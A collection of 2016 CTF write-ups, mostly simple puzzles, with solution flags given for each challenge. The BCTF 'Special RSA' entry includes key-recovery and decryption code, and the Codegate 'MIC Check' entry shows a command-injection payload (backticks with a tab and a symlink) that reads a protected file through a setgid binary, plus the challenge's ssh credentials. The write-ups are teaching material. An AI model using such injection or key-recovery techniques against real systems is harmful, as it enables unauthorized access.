March 2016

Pwn2Win CTF 2016 writeup Sum (Hello World Platform)

Sum (Hello World Platform)
Points: 20
Category: Programming Like Marathons
Description:

English:


This problem is an example on how to connect to our server to read inputs and send the outputs for the programming challenges. Given a set of numbers greater than zero, followed by zero and a line break, compute the sum of these numbers. The solution for this problem is available at: https://static.pwn2win.party/solvers-example-platform.tar.gz.  All you need to do in order to obtain the flag is to execute the implementation you see more fit!


openssl s_client -connect programming.pwn2win.party:9000

Extracting the downloaded archive yields source files written in C++, Java, and Python.
  • solve_sum.cpp
  • solve_sum.java
  • solve_sum.py
Simply running the Python program in a Python 2.7.9 environment displayed the flag, as shown below.
$ /usr/local/lib/python2.7.9/bin/python solve_sum.py
received: 6 3 4 6 5 2 6 6 2 0
sent: 40
received: 8 5 2 3 1 1 9 5 9 2 0
sent: 45
received: 7 1 5 4 2 9 9 0
sent: 37
received: 6 8 4 7 3 9 5 7 9 6 6 1 8 2 2 0
sent: 83
received: 5 5 8 3 8 3 9 7 1 7 1 1 2 2 5 9 5 7 0
sent: 88
received: 5 9 9 1 3 7 3 5 4 4 2 4 6 6 6 1 0
sent: 75
received: 2 7 9 1 2 8 5 6 5 9 6 5 5 8 9 9 2 7 4 0
sent: 109
received: 7 9 7 2 2 2 9 0
sent: 38
received: 5 7 1 3 9 6 2 6 3 3 7 1 4 4 2 1 0
sent: 64
received: 5 2 2 3 2 8 1 8 0
sent: 31
received: 9 7 5 5 1 3 8 1 7 6 1 7 0
sent: 60
received: 6 7 2 9 6 8 1 0
sent: 39
received: 1 1 6 2 3 7 0
sent: 20
received: 4 7 2 5 1 5 3 4 7 7 0
sent: 45
received: 3 3 5 6 5 3 3 6 4 2 6 4 4 1 0
sent: 55
received: 1 4 7 7 7 1 5 4 5 3 0
sent: 44
received: 2 3 5 6 7 1 6 4 9 2 1 0
sent: 46
received: 8 3 6 3 2 5 6 9 6 9 2 2 3 3 9 3 4 1 4 0
sent: 88
received: 2 5 4 3 9 1 1 7 8 6 0
sent: 46
received: 9 1 6 8 2 5 5 4 8 1 0
sent: 49
received: CTF-BR{Congrats!_you_know_how_to_sum!}
The flag is:
CTF-BR{Congrats!_you_know_how_to_sum!}



Pwn2Win CTF 2016 writeup g00d b0y

g00d b0y
Points: 10
Category: Bonus
Description:
English:
If you were a good kid, get your 10 points.
Click the following link, which is given in the registration confirmation e-mail.

IMPORTANT: read carefully and calmly the information and rules.
The information and rules page is displayed. Reading this page carefully, the flag is written near the bottom.

The flag is:
RTFM_1s_4_g00d_3xpr3ss10n_v2.0



Pwn2Win CTF 2016 writeup Skycast

Skycast:
Points: 10
Category: Story
Description:
"The Club - The Power Behind the Scenes"

English:
 
It all started in the 60s and 70s when there was still hope - when there was no Project SKY-80:37...
A small number of the most senior officers from the Brazilian military were unsatisfied with the way their country was being run and decided to create a secret organisation called the "Marble Club" (the original term was born on this occasion, and was used by a presenter later). This club had two main aims; to oust the existing dictatorship and subsequently become the political leaders of the country themselves. The Mentor (sometimes known as 'Fideleeto') set up meetings which were also attended by honorary members and the intellectual elite. Those who were away participated in the meetings via telephone (being a common device at the time).
The Club's rule was absolute, freedom of expression was not allowed and censorship was a core part of their ambitious plans. With their conspiracy beginning to take shape the next task was to establish an idea to use as an excuse for their existence - to try to avoid any 'reluctance' the general population may have about a regime change. The rally cry chosen was "For the defence of national security".
In the period following the regime change, the Club attempted to exert extreme control of the media. This later became known as the "buckshot period." The people however were not so easily fooled and the saying "Brazil, Love it or leave it" became a common catchphrase. Many left the country out of despair and disgust. The "buckshot period" was deemed to be unsuccessful and so the Club started devising more effective strategies to maintain their grasp on power. The approach they settled on was reverse tactics and avoid the use of force directly against the media. Instead they decided they would create and maintain the illusion of a democracy. They declared that one of their members, a "General Peixel", would be chosen as their puppet successor who would slowly set up a pseudo-democracy in the country to placate the opposition. Taking his orders from the Club, General Peixel announced the end the existing government and that elections would be held. This was just the first step. Brazil needed to rescue their exiled talented people so an amnesty law was created. "You need educated citizens but still gullible", said Mentor at a meeting of the Club.
However, even as direct elections were already being celebrated in the streets, the Club was studying and devising ways to have the appearance of a legitimate choosing of political representatives as voted by the people, but without losing the traditional control that it already had over the country. That's when the idea arose of Electronic Ballots, which began to be studied further in the 80s.
Also in the early 80s, a group called Project SKY-80:37 was formed by students (PhD) of Brazilian universities, initially with the aim of peaceful street protests organized by BBSs. The government repression was still in effect against this type of activity so no one was willing to take a leadership role. As a result the groups overt actions were few in number. However the thirst for change country was great meetings held frequently, and a new approach emerged: using knowledge to attack the root problem.
In the 90s, after the return of direct elections, and with a new puppet government in place, the Club met again with their advisers (including Mentor). Here is a rough translation from the meeting transcript, recorded with the help of a voice recorder created by a member of the Project and left in place the day before the meeting:
"You need to do something I never do, but it will be necessary for the course in Brazil remain in our tracks. These Electronic Booths which have proven to be reliable, that is, easy to tampering, according to reports. The big secret for the popularization is to invest in marketing, through the image that is safe".
At that meeting, the original idea of media censorship was again discussed, and again this time the approach was different. The Club realized that partnering with major media outlets to filter the information that suited them would be much more effective than punishing those that dared stand up to them, and would also benefit both sides.
The electronic voting booths were deployed and media partnerships negotiated. Election after election the people were unwittingly at the mercy of the Club's wishes, seeing only what they were allowed to see, doing exactly what The Club want them to do. The only spark of hope was called Project SKY-80:37.
My friends - we are here now fighting for a decent country using the biggest weapons we have: knowledge, hacking, and courage! Thanks to many old school friends (some still are active) who formed this group, we can get up and shout our cry of freedom because we are still alive and we will not be silenced.
We still have much to learn. We had the idea of broadcasting this message. We need your help in some missions. We have a lot of 'raw'  information about the Club and its activities that still need to be 'processed' quickly in order to be useful for us, for the people of Brazil and for the establishment of a real democracy.
This message was sent by SKYcast, only a select group of hackers can read it. We welcome those privileged few. I hope you can help us.
"For every action there is a reaction, we are the resistance, and the last resort." SKYbit89

Confirm receipt of the message by sending back "CTF-BR{SKYcast_recebido_e_lido}".
 
Greetings, SKYpitain82.
The flag is written near the end of the message.
The flag is:
CTF-BR{SKYcast_recebido_e_lido}


VolgaCTF 2016 Quals writeup Tic-Tac-Toe

0CTF 2016 Quals writeup Checkin

Correct Flag

Flag is 0ctf{w3lC0m3_t0_0CTF_2016}

The flag is:

0ctf{w3lC0m3_t0_0CTF_2016}



Sunshine CTF 2016 writeup Butterfly Effect

Butterfly Effect

50

judges: meowmeow

The challenge file is an image of a butterfly.

butterfly

Open the image in ImageJ and select "Image" → "Adjust" → "Color Balance". As in the figure below, select All and change Minimum from 0 to 254.

The result is as shown in the figure below.

The flag is:
sun{RE4DY_THE_4CID_M4GNET!}



BCTF 2016 writeup Special RSA

Special RSA Score: 200

crypto

While studying and learning RSA, I knew a new form of encryption/decryption with the same safety as RSA.

I encrypted msg.txt and got msg.enc as an example for you.

$ python special_rsa.py enc msg.txt msg.enc

Can you recover flag.txt from flag.enc?

special_rsa.zip.f6e85b8922b0016d64b1d006529819de

Extracting the archive yields the following files.
  • flag.enc
  • msg.enc
  • msg.txt
  • special_rsa.py
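From the encrypt routine in special_rsa.py, with m as the plaintext and c as the ciphertext, the scheme can be written as follows.
k ^ r * m ≡ c (mod N)
In addition, m can be read from msg.txt, and r and c from msg.enc. Doing so yields two triples, (m1, c1, r1) and (m2, c2, r2).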
c1 = 14548997380897265239778884825381301109965518989661808090688952232381091726761464959572943383024428028270717629953894592890859128818839328499002950828491521254480795364789013196240119403187073307558598496713832435709741997056117831860370227155633169019665564392649528306986826960829410120348913586592199732730933259880469229724149887380005627321752843489564984358708013300524640545437703771424168108213045567568595093421366224818609501318783680497763353618110184078118456368631056649526433730408976988014678391205055298782061128568056163894010397245301425676232126267874656710256838457728944370612289985071385621160886
m1 = 8246074182642091125578311828374843698994233243811347691229334829218700728624047916518503687366611595562099039411430662968666847086659721231623198995017758424796091810259884653332576136128144958751327844746991264667007359518181363522934430676655236880489550093852524801304612322373542296281962196795304499711006801211783005857297362930338978872451934860435597545642219213551685973208209873623909629278321181485010964460652298690058747090298312365230671723790850998541956664376820820570709272500330966205578898690396706695024001970727864091436518202414166919020415892764617055978488996164642229582717493375419993187360
r1 = 12900676191620430360427117641859547516838813596331616166760756921115466932766990479475373384324634210232168544745677888398849094363202992662466063289599443
c2 = 12793942795110038319724531875568693507469327176085954164034728727511164833335101755153514030256152878364664079056565385331901196541015393609751624971554016671160730478932343949538202167508319292084519621768851878526657022981883304260886841513342396524869530063372782511380879783246034751883691295368172069170967975561364277514063320691930900258017293871754252209727301719207692321798229276732198521711602080244950295889575423383308099786298184477668302842952215665734671829249323604032320696267130330613134368640401070775927197554082071807605399448960911234829590548855031180158567578928333030631307816223152118126597
m2 = 15575051453858521753108462063723750986386093067763948316612157946190835527332641201837062951012227815568418309166473080588354562426066694924364886916408150576082667797274000661726279871971377438362829402529682825471299861814829463510659258586020732228351258291527965822977048954720558973840956731377322516168809373640494227129998871167089589689796024458501705704779109152762373660542684880052489213039920383757930855300338529058000330103359636123251274293258
r2 = 7718975159402389617924543100113967512280131630286624078102368166185443466262861344357647019797762407935675150925250503475336639811981984126529557679881059
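Therefore, if k can be derived from these values, flag.enc can be decrypted.
To find k, we use the Chinese remainder theorem and the properties of integer congruences. The following site gives an accessible explanation of integer congruences.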
http://www2.cc.niigata-u.ac.jp/~takeuchi/tbasic/BackGround/Cong.html

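For the two triples (m1, c1, r1) and (m2, c2, r2), the following congruences hold.
k ^ r1 * m1 ≡ c1 (mod N)
k ^ r2 * m2 ≡ c2 (mod N)
Since gcd(m1, N) = 1 and gcd(m2, N) = 1, m1 and m2 are invertible modulo N, so these can be rewritten as follows, where division means multiplication by the modular inverse.
k ^ r1 ≡ c1 / m1 (mod N)
k ^ r2 ≡ c2 / m2 (mod N)
Multiplying the two congruences gives:
(k ^ r1) * (k ^ r2) ≡ (c1 / m1) * (c2 / m2) (mod N)   ・・・①
Looking up r1 and r2 on factordb shows that both are prime.
Therefore r1 and r2 are coprime, so there exist integers (a, b) such that
a * r1 + b * r2 = 1
Rearranging this gives
r2 = (1 - a * r1) / b   ・・・②
Substituting ② into ① and rearranging (in effect, raising the first congruence to the power a and the second to the power b and multiplying, so that the exponent of k becomes a * r1 + b * r2 = 1) gives
k ≡ (c1 / m1) ^ a * (c2 / m2) ^ b (mod N)
At this point, k is computed with the code below on SageMathCloud, a Python-based computer algebra system.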
def egcd(a, b):
    if a == 0:
        return (b, 0, 1)
    else:
        g, y, x = egcd(b % a, a)
        return (g, x - (b // a) * y, y)

N = 23927411014020695772934916764953661641310148480977056645255098192491740356525240675906285700516357578929940114553700976167969964364149615226568689224228028461686617293534115788779955597877965044570493457567420874741357186596425753667455266870402154552439899664446413632716747644854897551940777512522044907132864905644212655387223302410896871080751768224091760934209917984213585513510597619708797688705876805464880105797829380326559399723048092175492203894468752718008631464599810632513162129223356467602508095356584405555329096159917957389834381018137378015593755767450675441331998683799788355179363368220408879117131
c1 = 14548997380897265239778884825381301109965518989661808090688952232381091726761464959572943383024428028270717629953894592890859128818839328499002950828491521254480795364789013196240119403187073307558598496713832435709741997056117831860370227155633169019665564392649528306986826960829410120348913586592199732730933259880469229724149887380005627321752843489564984358708013300524640545437703771424168108213045567568595093421366224818609501318783680497763353618110184078118456368631056649526433730408976988014678391205055298782061128568056163894010397245301425676232126267874656710256838457728944370612289985071385621160886
m1 = 8246074182642091125578311828374843698994233243811347691229334829218700728624047916518503687366611595562099039411430662968666847086659721231623198995017758424796091810259884653332576136128144958751327844746991264667007359518181363522934430676655236880489550093852524801304612322373542296281962196795304499711006801211783005857297362930338978872451934860435597545642219213551685973208209873623909629278321181485010964460652298690058747090298312365230671723790850998541956664376820820570709272500330966205578898690396706695024001970727864091436518202414166919020415892764617055978488996164642229582717493375419993187360
r1 = 12900676191620430360427117641859547516838813596331616166760756921115466932766990479475373384324634210232168544745677888398849094363202992662466063289599443
c2 = 12793942795110038319724531875568693507469327176085954164034728727511164833335101755153514030256152878364664079056565385331901196541015393609751624971554016671160730478932343949538202167508319292084519621768851878526657022981883304260886841513342396524869530063372782511380879783246034751883691295368172069170967975561364277514063320691930900258017293871754252209727301719207692321798229276732198521711602080244950295889575423383308099786298184477668302842952215665734671829249323604032320696267130330613134368640401070775927197554082071807605399448960911234829590548855031180158567578928333030631307816223152118126597
m2 = 15575051453858521753108462063723750986386093067763948316612157946190835527332641201837062951012227815568418309166473080588354562426066694924364886916408150576082667797274000661726279871971377438362829402529682825471299861814829463510659258586020732228351258291527965822977048954720558973840956731377322516168809373640494227129998871167089589689796024458501705704779109152762373660542684880052489213039920383757930855300338529058000330103359636123251274293258
r2 = 7718975159402389617924543100113967512280131630286624078102368166185443466262861344357647019797762407935675150925250503475336639811981984126529557679881059

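# Bezout coefficients: a * r1 + b * r2 = g = 1 (one of a, b is negative)
g, a, b = egcd(r1, r2)
# In Sage, (c1 / m1) % N is c1 times the inverse of m1 modulo N
k = pow((c1 / m1) % N, a, N) * pow((c2 / m2) % N, b, N) % N
print(k)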
Running it yields k.
k = 175971776542095822590595405274258668271271366360140578776612582276966567082080372980811310146217399585938214712928761559525614866113821551467842221588432676885027725038849513527080849158072296957428701767142294778752742980766436072183367444762212399986777124093501619273513421803177347181063254421492621011961
Now that k is known, the following Python program recovers the plaintext from flag.enc.
import msgpack

def egcd(a, b):
    if a == 0:
        return (b, 0, 1)
    else:
        g, y, x = egcd(b % a, a)
        return (g, x - (b // a) * y, y)

def modinv(a, m):
    g, x, y = egcd(a, m)
    assert g == 1
    return x % m

def pad_even(x):
    return ('', '0')[len(x)%2] + x

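def decrypt(data, k):
    # Python 2 code: the file is a msgpack list of (r, c) pairs stored as byte strings
    out = ''
    k_inv = modinv(k, N)  # k^-1 mod N, the same for every block
    for r_s, c_s in msgpack.unpackb(data):
        r = int(r_s.encode('hex'), 16)
        c = int(c_s.encode('hex'), 16)
        # m = c * (k^-1)^r mod N
        out += pad_even(format(pow(k_inv, r, N) * c % N, 'x')).decode('hex')
    return out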

N = 23927411014020695772934916764953661641310148480977056645255098192491740356525240675906285700516357578929940114553700976167969964364149615226568689224228028461686617293534115788779955597877965044570493457567420874741357186596425753667455266870402154552439899664446413632716747644854897551940777512522044907132864905644212655387223302410896871080751768224091760934209917984213585513510597619708797688705876805464880105797829380326559399723048092175492203894468752718008631464599810632513162129223356467602508095356584405555329096159917957389834381018137378015593755767450675441331998683799788355179363368220408879117131
k = 175971776542095822590595405274258668271271366360140578776612582276966567082080372980811310146217399585938214712928761559525614866113821551467842221588432676885027725038849513527080849158072296957428701767142294778752742980766436072183367444762212399986777124093501619273513421803177347181063254421492621011961
print(decrypt(open("flag.enc", "rb").read(), k))
Running it displays the flag.
The flag is:
BCTF{q0000000000b3333333333-ju57-w0n-pwn20wn!!!!!!!!!!!!}
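The recovery of k derived above, carried through end to end as an added example that is not part of the original post or of special_rsa.py. It is a Python 3.8+ sketch on a constructed toy modulus; the names toy_encrypt, recover_k and demo and all numeric values are assumptions made for illustration.

```python
# Added example (Python 3.8+): recover k from two known (m, c, r) triples of
# the relation k^r * m ≡ c (mod N), then decrypt a third ciphertext.
# Every number here is a constructed toy value, not taken from the challenge.

def egcd(a, b):
    """Return (g, x, y) such that a*x + b*y == g == gcd(a, b)."""
    if a == 0:
        return b, 0, 1
    g, y, x = egcd(b % a, a)
    return g, x - (b // a) * y, y


def toy_encrypt(m, k, r, n):
    """Model of the encryption relation from the text: c = k^r * m mod n."""
    return pow(k, r, n) * m % n


def recover_k(t1, t2, n):
    """Recover k from two triples (m, c, r) whose exponents r are coprime."""
    (m1, c1, r1), (m2, c2, r2) = t1, t2
    g, a, b = egcd(r1, r2)            # a*r1 + b*r2 == g
    if g != 1:
        raise ValueError("r1 and r2 must be coprime")
    # "c / m" in the text is c * m^-1 mod n, defined because gcd(m, n) == 1.
    q1 = c1 * pow(m1, -1, n) % n      # k^r1 mod n
    q2 = c2 * pow(m2, -1, n) % n      # k^r2 mod n
    # One of a, b is negative; three-argument pow() inverts the base for a
    # negative exponent, so the product is k^(a*r1 + b*r2) = k^1 mod n.
    return pow(q1, a, n) * pow(q2, b, n) % n


def decrypt(c, r, k, n):
    """Invert the relation: m = c * (k^-1)^r mod n."""
    return c * pow(pow(k, -1, n), r, n) % n


def demo():
    n = (2**31 - 1) * (2**61 - 1)     # toy modulus: two Mersenne primes
    k = 123456789                     # secret, used only to build the samples
    r1, r2, r3 = 10007, 10009, 65537  # per-message exponents, stored with c
    m1 = int.from_bytes(b"msg", "big")    # known plaintext blocks
    m2 = int.from_bytes(b"txt", "big")
    flag = int.from_bytes(b"flag", "big")  # plaintext the attacker wants
    c1, c2 = toy_encrypt(m1, k, r1, n), toy_encrypt(m2, k, r2, n)
    c3 = toy_encrypt(flag, k, r3, n)

    # From here on only public data is used: (m1, c1, r1), (m2, c2, r2), c3, r3.
    k_rec = recover_k((m1, c1, r1), (m2, c2, r2), n)
    m3 = decrypt(c3, r3, k_rec, n)
    return k_rec, m3.to_bytes((m3.bit_length() + 7) // 8, "big")


if __name__ == "__main__":
    print(demo())
```

The design lesson for a defender is that a fixed k with a fresh public exponent per message gives no protection once a single plaintext is known twice over: two coprime exponents are enough to expose k.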




BCTF 2016 writeup catvideo

catvideo Score: 150

forensic

cat_video.mp4

Playing the downloaded video shows a screen of static-like noise.

Looking closely, there is subtle movement, so we extract each frame to an image file and take the difference between frames. Free Video to JPG Converter is used to extract the images from the video.
http://www.dvdvideosoft.com/products/dvd/Free-Video-to-JPG-Converter.htm

Extraction produced 1922 frames. Next, take the difference between frames: in ImageJ, open the two image files to compare and choose "Process" → "Image Calculator" with Operation set to XOR.

The following image is the XOR of frame 1 and frame 20.
0001xor0020

The original video appears to be the following, but this is not the flag.
"A cat that cannot stop kneading when it holds a toy in its mouth."

Next, XOR frame 1 with frame 140. This yields the following image.
0001xor0140

Therefore, the flag is:
BCTF{cute&fat_cats_does_not_like_drinking}



BCTF 2016 writeup irc

irc Score: 10

misc

Connect to the #bctf channel on Freenode (chat.freenode.net).
hh:mm チャンネルに入りました
hh:mm *xxxxxx join #bctf (~xxxxxx@yyy.zzz)
hh:mm *topic : BCTF{welcome_to_BCTF2016}
The flag is:
BCTF{welcome_to_BCTF2016}



Codegate CTF 2016 Quals writeup MIC Check

MIC Check

Who's in here?

ssh mic@175.119.158.131 -p11133
pw : miccheck
Connect to the given IP address and port over ssh, then list the files with ls. The flag is presumably in mic.flag.txt, but because its owner is different, it cannot be read directly.
mic@ubuntu:~$ ls -al
total 44
drwxr-x--- 3 root mic      4096 Mar 13 09:51 .
drwxr-xr-x 6 root root     4096 Mar 13 01:32 ..
drwxr-xr-x 2 root root     4096 Mar 13 01:49 .bash_history
-rw-r--r-- 1 root root      220 Mar 13 01:07 .bash_logout
-rw-r--r-- 1 root root     3771 Mar 13 01:07 .bashrc
-rwxr-sr-x 1 root miccheck 8992 Mar 13 02:04 miccheck
-rw-r--r-- 1 root root      698 Mar 13 02:04 miccheck.c
-r--r----- 1 root miccheck   23 Mar 13 01:28 mic.flag.txt
-rw-r--r-- 1 root root      675 Mar 13 01:07 .profile
Look at miccheck.c.
mic@ubuntu:~$ cat miccheck.c
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <string.h>

int main( int argc, char *argv[], char **environ )
{
        char buf[12] = { 0, };
        char cmd[2048] = { 0, };
        unsigned int i = 0;

        char **e;
        size_t len;

        printf( "input path :" );
        fgets( buf, 10, stdin );

        for( i = 0; i <= 11; i++ ) {
                if( buf[i] == '\'' ) exit(0);
                if( buf[i] == '&' ) exit(0);
                if( buf[i] == ';' ) exit(0);
                if( buf[i] == '|' ) exit(0);
                if( buf[i] == '\"' ) exit(0);
                if( buf[i] == ' ' ) exit(0);
        }


        sprintf( cmd, "/bin/ls -al /dev/%s", buf );

        for( e = environ; *e; ++e ) {
                len = strlen( *e );
                memset( *e, 0x00, len );
        }

        setregid( 1003, 1003 );
        system( cmd );

        return 0;
}
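The approach appears to be to run miccheck, which sits in the same directory, and use command injection to make it display the contents of the flag file. However, input is limited to 10 characters, so to save characters we first look for a directory with write permission and create a symbolic link with a one-character file name. Below, a symbolic link named f is created in the /dev/shm directory.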
mic@ubuntu:/dev/shm$ ln -s /home/mic/mic.flag.txt f
mic@ubuntu:/dev/shm$ ls -al
total 0
drwxrwxrwt  2 root root   60 Mar 14 01:14 .
drwxr-xr-x 19 root root 4320 Mar 14 01:03 ..
lrwxrwxrwx  1 mic  mic    22 Mar 14 01:14 f -> /home/mic/mic.flag.txt
Since the space character cannot be used, a tab is used instead, and the command is executed with backticks.
mic@ubuntu:/dev/shm$ /home/mic/miccheck
input path :a`cat       f`
/bin/ls: cannot access /dev/alet: No such file or directory
/bin/ls: cannot access the: No such file or directory
/bin/ls: cannot access hacking: No such file or directory
/bin/ls: cannot access begins: No such file or directory
The parts shown in red are the output of the "cat f" command; joining them, the flag is:
let the hacking begins
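Why the check in miccheck.c fails, and what a fix looks like, as an added example that is not code from the challenge or from the original post. It is a Python model of the C character loop beside an allowlist that builds an argv list, so no shell ever parses the input; all function names and the SHELL_SPECIAL set are assumptions made for illustration.

```python
# Added example: Python model of miccheck.c's character denylist, beside an
# allowlist check that builds an argv list so no shell ever parses the input.
import re

DENYLIST = set("'&;|\" ")   # the six characters miccheck.c exits on
FGETS_MAX = 9               # fgets(buf, 10, stdin) stores at most 9 bytes

# Characters /bin/sh still interprets that the denylist never looks for.
SHELL_SPECIAL = set("`$()<>*?\\\t\n")


def denylist_accepts(line):
    """Mirror of the C loop: reject only if a denylisted character is present."""
    return not any(ch in DENYLIST for ch in line[:FGETS_MAX])


def missed_by_denylist(line):
    """Shell-significant characters in the input that the denylist let through."""
    return sorted(set(line[:FGETS_MAX]) & SHELL_SPECIAL)


SAFE_NAME = re.compile(r"[A-Za-z0-9_.-]{1,9}")


def allowlist_accepts(name):
    """Accept only a plain device name; '.' and '..' are refused as well."""
    return SAFE_NAME.fullmatch(name) is not None and name not in (".", "..")


def build_argv(name):
    """Hardened form: validated name passed as one argv element, no shell.

    The list is meant for subprocess.run(argv) (or execv in C), which
    never hands the string to /bin/sh the way system() does.
    """
    if not allowlist_accepts(name):
        raise ValueError("rejected device name: %r" % name)
    return ["/bin/ls", "-al", "--", "/dev/" + name]


# The input used in the write-up (a tab separates "cat" and "f").
WRITEUP_INPUT = "a`cat\tf`"

if __name__ == "__main__":
    print(denylist_accepts(WRITEUP_INPUT), missed_by_denylist(WRITEUP_INPUT))
    print(allowlist_accepts(WRITEUP_INPUT), build_argv("null"))
```

The denylist fails because it enumerates bad characters for a parser (the shell) whose grammar is much larger; the allowlist plus an argv list removes the parser from the path entirely.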



